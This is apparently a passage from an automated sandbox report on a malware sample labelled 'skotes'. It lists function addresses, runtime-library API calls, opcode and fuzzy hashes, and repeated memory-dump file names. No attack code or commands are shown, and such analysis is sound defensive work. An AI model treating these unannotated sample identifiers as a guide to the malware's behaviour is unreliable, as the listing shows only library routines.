                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 218105897-0
                                                                                                                                              • Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                              • Instruction ID: d6309d90a18d788d3908b1ccc534cdb32d682efef3bce2effefe7705fdda7df8
                                                                                                                                              • Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                              • Instruction Fuzzy Hash: ADF0A731700A306FE662AB55A811F6B23D49F44719F40951FE41B97282CE2CEC82CB99
                                                                                                                                              Function 0041EFCD Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::critical_section::unlock.LIBCMT ref: 0041EFD1
                                                                                                                                                • Part of subcall function 0041F968: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041F989
                                                                                                                                                • Part of subcall function 0041F968: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041F9C0
                                                                                                                                                • Part of subcall function 0041F968: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0041F9CC
                                                                                                                                              • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041EFDD
                                                                                                                                                • Part of subcall function 0041F40F: Concurrency::critical_section::unlock.LIBCMT ref: 0041F433
                                                                                                                                              • Concurrency::Context::Block.LIBCONCRT ref: 0041EFE2
                                                                                                                                                • Part of subcall function 00420366: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00420368
                                                                                                                                              • Concurrency::critical_section::lock.LIBCONCRT ref: 0041F002
                                                                                                                                                • Part of subcall function 0041F891: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041F8AC
                                                                                                                                                • Part of subcall function 0041F891: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0041F8B7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$LockNodeNode::Queue$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 811866635-0
                                                                                                                                              • Opcode ID: 288a300020d859b1ef83b611f078531e2712a57bf32c35a77a8106ea6d39aef0
                                                                                                                                              • Instruction ID: fdf4501154c7c1c56dcdbec0c2722d580242c7d44f689b66cda82c1813ca1d84
                                                                                                                                              • Opcode Fuzzy Hash: 288a300020d859b1ef83b611f078531e2712a57bf32c35a77a8106ea6d39aef0
                                                                                                                                              • Instruction Fuzzy Hash: B2E0D834900100ABCB04FB21C4511DCBB61BF44324B00431EE461172E2CF385E8BCB88
                                                                                                                                              Function 0043F35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___free_lconv_mon
                                                                                                                                              • String ID: 8"F$`'F
                                                                                                                                              • API String ID: 3903695350-3117062166
                                                                                                                                              • Opcode ID: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
                                                                                                                                              • Instruction ID: 543839021cf0bf63342fab8d7291383f9c2b30be018e8c543b9015e977d3828c
                                                                                                                                              • Opcode Fuzzy Hash: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
                                                                                                                                              • Instruction Fuzzy Hash: 0C31A232A00201DFEB206A3AD845B5B73E6EF18315F10642FE485D7691DF78EC94CB19
                                                                                                                                              Function 0043F1BF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 0043F232
                                                                                                                                              • __freea.LIBCMT ref: 0043F298
                                                                                                                                                • Part of subcall function 0043B04B: RtlAllocateHeap.NTDLL(00000000,EBA58D57,?,?,0041D3FC,EBA58D57,?,00417A8B,?,?,?,?,?,?,00407465,?), ref: 0043B07E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap__alloca_probe_16__freea
                                                                                                                                              • String ID: ZC,mC
                                                                                                                                              • API String ID: 809856575-3499607563
                                                                                                                                              • Opcode ID: 48b0b541c6844b4bac158ef3165f1a4b931efef5229be1c1a5e2a9e78c2fb551
                                                                                                                                              • Instruction ID: dc497ce6df3af0ac8993855150aa88e2d431c8bd73d0ff441ae055568ba89d4f
                                                                                                                                              • Opcode Fuzzy Hash: 48b0b541c6844b4bac158ef3165f1a4b931efef5229be1c1a5e2a9e78c2fb551
                                                                                                                                              • Instruction Fuzzy Hash: C931F071D0020AEBDB209F65CC41EAF7BB8EF88314F04416AF914AB251DB399C55CBA8
                                                                                                                                              Function 00431704 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00431764
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004317AF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
